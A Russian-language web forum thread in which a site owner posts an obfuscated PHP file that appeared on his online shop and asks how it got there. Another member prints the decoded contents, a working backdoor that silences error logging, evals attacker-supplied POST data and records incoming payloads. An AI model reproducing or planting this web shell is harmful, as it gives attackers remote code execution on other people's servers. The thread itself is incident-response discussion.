default.php

Discussion in 'Уязвимости' started by Asbury, 17 Jan 2013.

  1. Asbury

    Asbury New Member

    Joined:
    8 Feb 2009
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Привет народ, снедавних пор на моем сайте стали проиходить чудеса. Появляется скрипт с содержанием:
    PHP:
    <?php eval(gzinflate(base64_decode("DVa1DutYFPyXrd6TCzNpKzPFlJiblZkZYt+v35SnGp0ZDZRXOvypQTtVQ3qUf7J0Lyniv6LM56L884+YpCjYfWPrsypJFzAIxre+F0sKs9GSiybZaQ+noS9pbjIJ+cOA5hQsWzAduBYVqFBPBXSbOnBAemSkezCsFS9pHrKMnK7LPdIXLNxkNbU+tIbd2vXEaT9PYwirpIdaf9flWej62gkoCcX0l/vQmJA+sby8Ah+xBxKpkla0fqCu8k7Uru8yi28LYBYVo80XaVZhxd8m+lxPLgvsp3QlyBDFD3NxqjuIbVd22iPI0uIhqp2jwGEDGmhy/ZGU/qksEZY1HEyr0FQm5jAW6yjakaTPxjrGVN3kDiVWPTlybxvgC9ay6qQiLMzjXF4+Mj7gZQOltohc/5JBGqQIk4BxS+0pFsNso9R5szOYyHbjC417pL4BHeT2HpN6HYXn3uyr0FNUZ9xtWOnLd93oj6RXdG9y/bVW1o9DO2W+lec39UnXMvcqH44ELesw7DtEVZr1pLNK8SOdDdMZcyAWojjjZAPgFAbfp7egNKH9WVS34w5X6EQ+84zGFLKmg4/KVSrH227GVHR+qkU+EUV6CtuYPnj3BESkTnAd0WpQ2JY5zfNx4GV/XK9HVDOX4aoUCHTiEhoPypzKyWPx/HOgYNcjuX0dVFqTbIAFJZARNNdtrUP2wprHxsBRi9+567B5pliVtJHY5m0iQKHfH1q9oefNvKTgEs2ewfG6eyV7oNdexEWuh78IjjLXPQiI6k7kguxbMMN2Xbfie3Y++yu/UReRF6e7xUNDkCXcm29mLGrUa1aGYWRg/YA541LbtnMLpkGovse1ElQk9JEZcd1tooshEHc0J1+rSTmfqnyXxrByNfEstoJxaVIfccab45y/t+Mx5L43axbrUuujCYsyFbwyx1NsJ4QtO1OQhUX8msWZ7DLPR53YAZAt9hsZi4pvSOUkvU7slG2lHyZ0cGJvW9FxPbGlylYL3yVqfUXOSBV3mUd9mkIkim386iZNHyH3QD0Zgi6QBfhpn30aynboxB71CRvq+1gYLH/iq/cRszzuvCNmuXDCKIl9RSu5FQKnkwH3Vc79PHjiUFR75uDEQcmCjD7hO13HH/e2iosz/8TOq340m9/OZUYGnRiFlb2rty6gLeVN6wzXrYfV4QDAId0HUChMO8ufAE1ySNb7YzK/aJjgO4mcL+g0NfTsG08EIK3TNd0CA7G96wWX/n0itcEi9MZqN87u9q0pjTbbYa55Js67fWHoSN0oHe4zjtbzztljgoFDHheFdXJmM84f2Rm/rQ6sZxWg/mqQ2+Pi/U36/YHsa4+9jiw4i24xXMvU3+VU0+J01mFvpdNBFTS7Iyr1PMOHhzFdFOqlUiv18WC/7tw+PdNiVOde8lvdho3qVhdA2AbG2dZmxpshQNFwHZveUqQLCeE7w3sBtl8sEynsCTZJifGPnmrlclHs2p+zEsbE105FKJx0QokEI9hckfpUcKp8OAN9xb+rkgLWoWw10PGIiL+cRa3K7+OHmiRlWOeOoFzm3sxFGc2tXbGk4dAiM1YlflFvVawmYizlnpljTfzAt8jMgvkYZVNmfnpTiI9gwHpLUgCt9ksNYAk2OlLa80RUHnooM4OxNIryQVPQmzzb/BTzAAxiUuglzHZH0ZueKgt+FudJAXACEnfU+Ug3Wd4mwGK83lm+pOS5LaixVbmjEJ/b+5a8gpNxGzDEiZQC+d59e871Fx+HgOtvGxdrOqOJipw9lWIvqlz4LT3xQHW1hHaadq7oO5xrzsvtz+vl8oU9uqOLV+/9hWGcdh9ypRrLu9jnZh8uypTIr5Z88koUy+Qcv8zQ5K5ZDVWRuueq7bNheRwb4qXii9/qM+azu0vGDlrMvdI80kNRAU57/zqH+e7Fr/hec3NQu1aIWz6Vh9vAcdh/kCRmE8GnGVLwU4bnzUj/EshEfkgdmm6b/hZ99Qz2PVEA8ap85neGuhE+MwtBlRgcsPvdasGYp4L5Ri9ea0+UVeeWKhpzOHvE2TSraeIsIpPYpY6rm6ikSb44FsmKoDxBXN4uC62bHiTzCFDdcFqJH3ujmnNOPqdFUNDo2bkMvVtorzwxw8HCPsJrmgn6R+g+L5ePllnlPZ+Ss7tVGqROeFEsHR7++CoOyHbeKrTJkjsNRu2kDzzJalJ8VW3yBXHzmufj1pAAxV1dm45+eUS1UgwX2fRih3raBCM1c5EY9QRfP8/WoEwYqUr0SznE77O9XDP8aymJfz+YxvqMSZe9RzB5RASDoE26pdg/LwI/nm7ZOZzDxdhohkHWfuXqXejjY9y6v62ec3x/TvCiaJZ8KyNxp+AMfQfJ2G6jVgS+Z18eq9tyjwCC4nREztpgsSCn5VTDBeK+798cwtbHdI5M1RtFrjuaoksir9HBSP0qIX0+cBh+glHW2WDnnYRUJ9e/eNbqBNjVdk5zswLAvcVt4WvSG04EFnFlUhsvtBYpEdhawkPIvPtFLZ03wMAtrBd7NQ2t0CrcWBRej2bbzLrzcnr2Xg2EejiBdKrPwpKcWVaESs0bHRbMsf1AfW5N5hjoiYKnzcI9yjtom3GD6S5iZN/ZBtQtzrdsXr2239IrBjH+CGxh8Pb4RIyLO7Y//qbV4BQ/5ee9wWW5MqwJtemLnwWdPcMLjM+j+P5jGGPfwv0mdRDVYr/eEsxDZJAShXsY4+PFoC34G0vzjiG8Qubs42gRvzyl+HyATLTRHrs3PTWfHMtyMk9avJe3aoSlzUTF6NBAi7irbL8MyJukH2DlqAMFrPUUNF2JK6EI8p16f2WvWMM4YWDtN7z8m2iz4jSHj2bm8by//TKZCdlKzJ1AySyxtR7EcQZBQu559HKLXUQNcb8+csT/mkykyY7LSWi3jRmJBGhwneiTSJXFiQF/xRt0Llio4oJzrTj9kAOpXuHymblk1BM1wnVHnmyE3ioCKHqPuHnYDOQc2xnkjIuaOCIZolM4aL+nuqDHebsbNynEjYO1d7a46/M3x7JkXJaavVmH/zVNpkFcqWnEiXXsCr6thR4NpbsqgqEjy2N2iRHftVWQJqYUmNK07iaObs2uktFVAl6cvX/jKd1E2azLNP9U64PwSIBnbO28omum8eGnxbW+H8dVGNxVoi4TpGWQk3FMsgmLgS94t7G7PMcJt9DTFczSAIbh67oqmKn++fv377//Aw=="))); ?>
    Так вот я вроде всё делал как на любимом форуме написано, все данные внешние перед запросом обрабатывал функцией mysql_real_escape_string, где переменная цифровая проверял цифровая ли она и тп, а получается есть sqlinj.

    Друзья, как быть?
    То просто фаил появлялся, а теперь htaccess ставится редирект на какойто ГС...
     
  2. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Может проблема не в Вас в соседе который тоже находится на этом сервере? Обратитесь с проблемой к хостингу провайдеру. Пусть они проверят логи, откуда, что и куда...
     
  3. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Аж греют душу такие сообщения =))))))))))))))))))) (Гомерический хохот за кадром)
     
  4. Asbury

    Asbury New Member

    Joined:
    8 Feb 2009
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    cat1vo, Да вот дело в том что логи предоставляются, а в них грамота филькина. Вроде как во мне причина...

    Cennarios, есть замечательный русские поговорки про радость чужим неудачам...
     
  5. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    ТС, убирай этот код, закрывай дыры, ищи среди файлов шеллы, а также минишеллы записанные среди кода твоих основных файлов, прост посмотри какие в последнийраз менялись и быстро найдёшь
     
  6. cLauZ

    cLauZ Member

    Joined:
    22 Oct 2009
    Messages:
    339
    Likes Received:
    27
    Reputations:
    5
    Что за проект?=)
     
  7. йож

    йож Banned

    Joined:
    31 Aug 2012
    Messages:
    54
    Likes Received:
    10
    Reputations:
    0
    дай ссылку на этот файл, посмотрим
     
  8. Asbury

    Asbury New Member

    Joined:
    8 Feb 2009
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    qaz, так могли дату обновления подменить)
    Минишел - это запрос к текстовому фаилу с последущей генерацией на сервере шела?)

    cLauZ, интернет-магазин

    йож, так содержание фаила выложено.

    Предоставили мне логи, а там жесть какаято. Щас буду учиться читать логи. Но как я понимаю фаила с дырой мне не скажут логи?)
     
  9. Qwert321

    Qwert321 Banned

    Joined:
    25 Jan 2009
    Messages:
    33
    Likes Received:
    0
    Reputations:
    0
    вот если надо, чё там внутри...
    PHP:
    <?php
    @error_reporting(0);
    @
    ini_set("display_errors",0);
    @
    ini_set("log_errors",0);
    @
    ini_set("error_log",0);
    if (isset(
    $_GET['r'])) {
        print 
    $_GET['r'];
    } elseif (isset(
    $_POST['e'])) {
        eval(
    base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));
    } elseif (isset(
    $_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') {
        
    $data file_get_contents('php://input');
        if (
    strlen($data) > 0) print 'STATUS-IMPORT-OK';
        if (
    strlen($data) > 12) { 
            
    $fp=@fopen('tmpfile','a');
            @
    flock($fpLOCK_EX);
            @
    fputs($fp$_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n");
            @
    flock($fpLOCK_UN);
            @
    fclose($fp);
        } 

    exit;
    ?>
     
  10. Asbury

    Asbury New Member

    Joined:
    8 Feb 2009
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    могу ли я запись:
    Tue Nov 06 18:36:02 2012 0 ::ffff:65.254.224.34 3040 /home/users1/a/user_name/default.php b _ i r юзер ftp 0 * c

    интерпретировать, как косяк со стороны хостинга?!
    Получается что фаил был внезапно скачан в корневую директорию ftp, а не в один из сайтов на ftp, за которые спрос был бы с меня?
     
    #10 Asbury, 18 Jan 2013
    Last edited: 18 Jan 2013
  11. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    не мели чепуху

    да и вобще, те логи толку тебе особого не дадут, делай как я сказал или будешь до конца своих дней там парится
     
  12. Asbury

    Asbury New Member

    Joined:
    8 Feb 2009
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    qaz, шеллом я менял дату изменения фаила...

    Совет то не плохой, осталось лишь решить, с чего начать.

    Залиться могли только при наличии sql-inj? Или могут быть и другие дыры в пхп скрипте?

    Подумал, а если из переменной которую подставляю в запрос вырезать кавычки, поможет?)
     
    #12 Asbury, 18 Jan 2013
    Last edited: 19 Jan 2013
Loading...
Similar Threads - default
  1. ettee
    Replies:
    44
    Views:
    129,283